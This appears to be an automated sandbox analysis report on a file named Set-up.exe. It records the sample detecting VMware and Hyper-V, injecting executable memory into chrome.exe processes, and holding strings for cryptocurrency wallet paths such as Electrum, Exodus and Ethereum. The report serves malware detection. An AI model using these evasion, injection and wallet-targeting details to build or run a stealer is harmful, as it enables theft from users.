            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\Set-up.exeAPI/Special instruction interceptor: Address: 7FFCC372D304
            Source: C:\Users\user\Desktop\Set-up.exeAPI/Special instruction interceptor: Address: 7FFCC372D744
            Source: C:\Users\user\Desktop\Set-up.exeAPI/Special instruction interceptor: Address: 7FFCC3730154
            Source: C:\Users\user\Desktop\Set-up.exeAPI/Special instruction interceptor: Address: 7FFCC372DA44
            Source: Amcache.hve.12.drBinary or memory string: VMware
            Source: Amcache.hve.12.drBinary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.12.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.12.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.12.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.12.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.12.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.12.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.12.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.12.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.12.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.12.drBinary or memory string: vmci.sys
            Source: Amcache.hve.12.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
            Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.12.drBinary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.12.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.12.drBinary or memory string: VMware20,1
            Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.12.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.12.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.12.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.12.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.12.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.12.drBinary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.12.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.12.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.12.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Users\user\Desktop\Set-up.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_01FF01A3 LdrLoadDll,0_2_01FF01A3
            Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_01FD09E1 mov eax, dword ptr fs:[00000030h]0_2_01FD09E1
            Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_01FD0421 mov edx, dword ptr fs:[00000030h]0_2_01FD0421
            Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_01FD0D91 mov eax, dword ptr fs:[00000030h]0_2_01FD0D91
            Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_01FD1031 mov eax, dword ptr fs:[00000030h]0_2_01FD1031
            Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_01FD1030 mov eax, dword ptr fs:[00000030h]0_2_01FD1030
            Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_01FD1A1F mov eax, dword ptr fs:[00000030h]0_2_01FD1A1F
            Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_03F85BC0 mov eax, dword ptr fs:[00000030h]0_2_03F85BC0

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\Set-up.exeMemory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1D736FB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1D736FC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1D736FD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1D736FE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1D736FF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 243932A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 243932B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 243932C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 243932D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 243932E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 243932F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 258B17B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 258B17C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 258B17D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 258B17E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 258B17F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 258B1800000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1AD16B90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1AD16BA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1AD16BB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1AD16BC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1AD16BD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1AD16BE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeNtAllocateVirtualMemory: Indirect: 0x3F8845DJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeThread register set: target process: 7228Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeThread register set: target process: 7260Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeThread register set: target process: 3888Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeThread register set: target process: 1692Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1D736FC0000Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1D736FD0000Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1D736FE0000Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1D736FB0000Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1D736FB0008Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1D736FB0010Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1D736FB0018Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1D736FB0020Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1D736FB0028Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1D736FB0030Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1D736FF0000Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 243932B0000Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 243932C0000Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 243932D0000Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 243932A0000Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 243932A0008Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 243932A0010Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 243932A0018Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 243932A0020Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 243932F0000Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 258B17C0000Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 258B17D0000Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 258B17E0000Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 258B17B0000Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 258B17B0008Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 258B17B0010Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 258B17B0018Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 258B17B0020Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 258B1800000Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1AD16BA0000Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1AD16BB0000Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1AD16BC0000Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1AD16B90000Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1AD16B90008Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1AD16B90010Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1AD16B90018Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1AD16B90020Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1AD16BE0000Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.12.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.12.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.12.drBinary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: Process Memory Space: Set-up.exe PID: 7572, type: MEMORYSTR
            Source: Set-up.exe, 00000000.00000002.1544669791.0000000004100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Roaming\Electrum\wallets
            Source: Set-up.exe, 00000000.00000002.1544669791.0000000004100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Roaming\ElectronCash\wallets
            Source: Set-up.exe, 00000000.00000002.1544669791.0000000004100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Publicp.inir......All UsersAll Users\??\C:\Users\All Users\??\C:\Users\All UsersDefaultDefault\??\C:\Users\Default\??\C:\Users\DefaultDefault UserDefault User\??\C:\Users\Default User\??\C:\Users\Default Userdesktop.inidesktop.ini\??\C:\Users\desktop.iniuseruser\??\C:\Users\user\??\C:\Users\userPublicPublic\??\C:\Users\Public\??\C:\Users\Public\??\C:\Users\All Users\AppData\??\C:\Users\All Users\AppData\Roaming\Electrum\wallets\??\C:\Users\All Users\AppData\Roaming\Electrum\wallets\??\C:\Users\Default\AppData\??\C:\Users\Default\AppData\Roaming\Electrum\wallets\??\C:\Users\Default\AppData\Roaming\Electrum\wallets\??\C:\Users\Default User\AppData\??\C:\Users\Default User\AppData\Roaming\Electrum\wallets\??\C:\Users\Default User\AppData\Roaming\Electrum\wallets\??\C:\Users\user\AppData\??\C:\Users\user\AppData\Roaming\Electrum\wallets\??\C:\Users\user\AppData\Roaming\Electrum\wallets\??\C:\Users\Public\AppData\??\C:\Users\Public\AppData\Roaming\Electrum\wallets\??\C:\Users\Public\AppData\Roaming\Electrum\wallets
            Source: Set-up.exe, 00000000.00000002.1544669791.0000000004100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: window-state.json
            Source: Set-up.exe, 00000000.00000002.1544669791.0000000004100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
            Source: Set-up.exe, 00000000.00000002.1544669791.0000000004100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
            Source: Set-up.exe, 00000000.00000002.1544669791.0000000004100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: info.seco
            Source: Set-up.exe, 00000000.00000002.1544669791.0000000004100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Publicp.inir......All UsersAll Users\??\C:\Users\All Users\??\C:\Users\All UsersDefaultDefault\??\C:\Users\Default\??\C:\Users\DefaultDefault UserDefault User\??\C:\Users\Default User\??\C:\Users\Default Userdesktop.inidesktop.ini\??\C:\Users\desktop.iniuseruser\??\C:\Users\user\??\C:\Users\userPublicPublic\??\C:\Users\Public\??\C:\Users\Public\??\C:\Users\All Users\AppData\??\C:\Users\All Users\AppData\Roaming\Exodus\??\C:\Users\All Users\AppData\Roaming\Exodus\??\C:\Users\Default\AppData\??\C:\Users\Default\AppData\Roaming\Exodus\??\C:\Users\Default\AppData\Roaming\Exodus\??\C:\Users\Default User\AppData\??\C:\Users\Default User\AppData\Roaming\Exodus\??\C:\Users\Default User\AppData\Roaming\Exodus\??\C:\Users\user\AppData\??\C:\Users\user\AppData\Roaming\Exodus\??\C:\Users\user\AppData\Roaming\Exodus\??\C:\Users\Public\AppData\??\C:\Users\Public\AppData\Roaming\Exodus\??\C:\Users\Public\AppData\Roaming\Exodus``
            Source: Set-up.exe, 00000000.00000002.1544669791.0000000004100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: passphrase.json
            Source: Set-up.exe, 00000000.00000002.1544669791.0000000004100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Publicp.inir......All UsersAll Users\??\C:\Users\All Users\??\C:\Users\All UsersDefaultDefault\??\C:\Users\Default\??\C:\Users\DefaultDefault UserDefault User\??\C:\Users\Default User\??\C:\Users\Default Userdesktop.inidesktop.ini\??\C:\Users\desktop.iniuseruser\??\C:\Users\user\??\C:\Users\userPublicPublic\??\C:\Users\Public\??\C:\Users\Public\??\C:\Users\All Users\AppData\??\C:\Users\All Users\AppData\Roaming\Ethereum\??\C:\Users\All Users\AppData\Roaming\Ethereum\??\C:\Users\Default\AppData\??\C:\Users\Default\AppData\Roaming\Ethereum\??\C:\Users\Default\AppData\Roaming\Ethereum\??\C:\Users\Default User\AppData\??\C:\Users\Default User\AppData\Roaming\Ethereum\??\C:\Users\Default User\AppData\Roaming\Ethereum\??\C:\Users\user\AppData\??\C:\Users\user\AppData\Roaming\Ethereum\??\C:\Users\user\AppData\Roaming\Ethereum\??\C:\Users\Public\AppData\??\C:\Users\Public\AppData\Roaming\Ethereum\??\C:\Users\Public\AppData\Roaming\Ethereum
            Source: Set-up.exe, 00000000.00000002.1544669791.0000000004100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Roaming\Exodus
